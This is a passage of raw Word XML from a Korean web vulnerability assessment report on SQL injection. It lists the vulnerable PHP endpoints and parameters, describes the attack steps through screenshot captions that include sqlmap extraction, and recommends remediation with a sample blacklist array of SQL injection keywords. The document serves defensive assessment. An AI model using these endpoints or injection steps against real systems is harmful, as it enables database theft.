        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="420" w:name="_Toc48909026"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w:rsidR="005B38C6" w:rsidRPr="00A24C89" w:rsidRDefault="008C7EC1" w:rsidP="008C7EC1">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0096588F" w:rsidRPr="00A24C89">
        <w:t>SQL 인젝션은 응용프로그램 보안 상의 허점을 의도적으로 이용해, 개발자가 생각지 못한 SQL문을 실행되게 함으로써 데이터베이스를 비정상적으로 조작하는 공격 방법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc48909027"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421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9D19C1" w:rsidRPr="00A24C89" w:rsidTr="00186100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186100" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="0018610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A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">취약한 </w:t>
            </w:r>
            <w:r w:rsidR="00186100" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>매소드/</w:t>
            </w:r>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>경로</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00186100" w:rsidRPr="00A24C89" w:rsidRDefault="00186100" w:rsidP="0018610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A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>및 파라미터</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00186100" w:rsidRPr="00A24C89" w:rsidRDefault="00186100" w:rsidP="005A5428">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t>* GET /m_view.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00186100" w:rsidRPr="00A24C89" w:rsidRDefault="00186100" w:rsidP="005A5428">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLineChars="100" w:firstLine="200"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t xml:space="preserve">- ps_db, ps_boid, </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00186100" w:rsidRPr="00A24C89" w:rsidRDefault="00186100" w:rsidP="005A5428">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t>* GET /m_mall_list.php?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F4C4F" w:rsidRPr="00A24C89" w:rsidRDefault="00186100" w:rsidP="005A5428">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="195"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t>- ps_ctid,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005A5428" w:rsidRPr="00A24C89" w:rsidRDefault="005A5428" w:rsidP="005A5428">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t>* POST /m_poll_ok.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005A5428" w:rsidRPr="00A24C89" w:rsidRDefault="005A5428" w:rsidP="005A5428">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="195"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t>- ps_poid, comment_name, comment_body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D19C1" w:rsidRPr="00A24C89" w:rsidTr="00186100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9D19C1" w:rsidRPr="00A24C89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A24C89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9D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="00DA26A1" w:rsidP="00DA26A1">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00D52F09" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00D52F09" w:rsidRPr="00A24C89">
              <w:t xml:space="preserve">QL </w:t>
            </w:r>
            <w:r w:rsidR="00D52F09" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">인젝션 공격에 취약한 파라미터가 존재하며, 이 취약점을 통해 </w:t>
            </w:r>
            <w:r w:rsidR="00D52F09" w:rsidRPr="00A24C89">
              <w:t>DB</w:t>
            </w:r>
            <w:r w:rsidR="00D52F09" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>의 중요한 정보를 공격자가 탈취 가능함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="009D19C1"/>
    <w:p w:rsidR="00C571DC" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="0018610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A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#1]</w:t>
      </w:r>
      <w:r w:rsidR="00642533" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00642533" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL 인젝션 공격이 가능한지 시도함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00186100" w:rsidRPr="00C97C1E" w:rsidRDefault="00186100" w:rsidP="0064253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>
            <wp:extent cx="4848808" cy="2988000"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="22225"/>
            <wp:docPr id="11" name="그림 11" descr="C:\Users\student\Yim\AI_security\프로젝트\웹 취약점 진단 이미지\5. 코어_SQL 인젝션_에러노출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9" t="-2" r="56016" b="56072"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876299" cy="300494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9C1" w:rsidRPr="00A24C89" w:rsidRDefault="00C571DC" w:rsidP="00C571DC">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="_Toc48909153"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림 3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00EA36A9" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>SQL 인젝션 공</w:t>
      </w:r>
      <w:r w:rsidR="00642533" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>격 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
    </w:p>
    <w:p w:rsidR="00A20EE4" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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642533" w:rsidRPr="00C97C1E" w:rsidRDefault="00642533" w:rsidP="0064253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</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2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>SQL 인젝션 공격</w:t>
      </w:r>
      <w:r w:rsidR="00DB3278" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>의 에러 메시지 반환으로 MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00DB3278" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> DB</w:t>
      </w:r>
      <w:r w:rsidR="00DB3278" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>사용을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00642533" w:rsidRPr="00C97C1E" w:rsidRDefault="00642533" w:rsidP="0064253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5767B166" wp14:editId="400D7A9C">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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49396" b="50012"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860830" cy="306074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33" w:rsidRPr="00A24C89" w:rsidRDefault="00642533" w:rsidP="00642533">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="_Toc48909154"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림 3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00DB3278" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>오류 메시지 반환</w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w:rsidR="00A20EE4" w:rsidRPr="00C97C1E" w:rsidRDefault="00A20EE4" w:rsidP="00A20EE4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB3278" w:rsidRPr="00C97C1E" w:rsidRDefault="00DB3278" w:rsidP="00DB327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</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>3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>자동화 공격을 통해 웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">서버의 중요한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>정보를 확득</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3278" w:rsidRPr="00C97C1E" w:rsidRDefault="00DB3278" w:rsidP="00DB327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0E788E7D" wp14:editId="41FF1CDD">
            <wp:extent cx="4859099" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="266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3" r="26169" b="44346"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860601" cy="3060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278" w:rsidRPr="00A24C89" w:rsidRDefault="00DB3278" w:rsidP="00DB3278">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="_Toc48909155"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림 3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Sqlmap으로 DB의 중요 정보 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
    </w:p>
    <w:p w:rsidR="00DB3278" w:rsidRPr="00C97C1E" w:rsidRDefault="00DB3278" w:rsidP="00A20EE4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00123DEF" w:rsidRPr="00C97C1E" w:rsidRDefault="00123DEF" w:rsidP="009D19C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B38C6" w:rsidRPr="00C97C1E" w:rsidRDefault="005B38C6" w:rsidP="009D19C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D19C1" w:rsidRPr="00C97C1E" w:rsidRDefault="009D19C1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="_Toc48909028"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w:rsidR="005B38C6" w:rsidRPr="00A24C89" w:rsidRDefault="005B38C6" w:rsidP="00A24C89">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스코드</w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL Query </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입력</w:t>
      </w:r>
      <w:r w:rsidR="00535DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 받는 함수나 코드를 써야 할 경우,</w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">임의의 </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL Query </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">입력에 대한 검증 로직을 구현해야 함(있는 </w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:t>‘, “, -</w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 문자의</w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> 필터링을 권고</w:t>
      </w:r>
      <w:r w:rsidR="005F1589" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1589" w:rsidRPr="00A24C89" w:rsidRDefault="005F1589" w:rsidP="00A24C89">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">검증되지 않는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>SQL Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 인수값으로 사용될 경우 에러 페이지가 아닌,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정상 페이지가 반환되도록 필처링 처리를 해야</w:t>
      </w:r>
      <w:r w:rsidR="000D6A9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D106E9" w:rsidRPr="00A24C89" w:rsidRDefault="005F1589" w:rsidP="00A24C89">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- 웹 방화벽을 운용할 경우 웹 방화벽에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인젝션 관련 룰 셋을 적용하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션 공격을 차단함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D106E9" w:rsidRPr="00A24C89" w:rsidRDefault="005F1589" w:rsidP="00A24C89">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D106E9" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">또한 아래코드 형태의 </w:t>
      </w:r>
      <w:r w:rsidR="00D106E9" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">BlackList </w:t>
      </w:r>
      <w:r w:rsidR="00D106E9" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">필터링 기법이 아닌 허용된 문자만 입력 받는 </w:t>
      </w:r>
      <w:r w:rsidR="00D106E9" w:rsidRPr="00A24C89">
        <w:t>WhiteList</w:t>
      </w:r>
      <w:r w:rsidR="00D106E9" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방식으로 필터링 될 것을 권고합니다.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7655"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F1589" w:rsidRPr="00C97C1E" w:rsidTr="005F1589">
        <w:trPr>
          <w:trHeight w:val="4820"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> BlackList = Array("--", ";", "/*", "*/", "@@", "@",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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char", "nchar", "varchar", "nvarchar",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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alter", "begin", "cast", "create", "cursor",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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declare", "delete", "drop", "end", "exec",_</w:t>
            </w:r>
          </w:p>
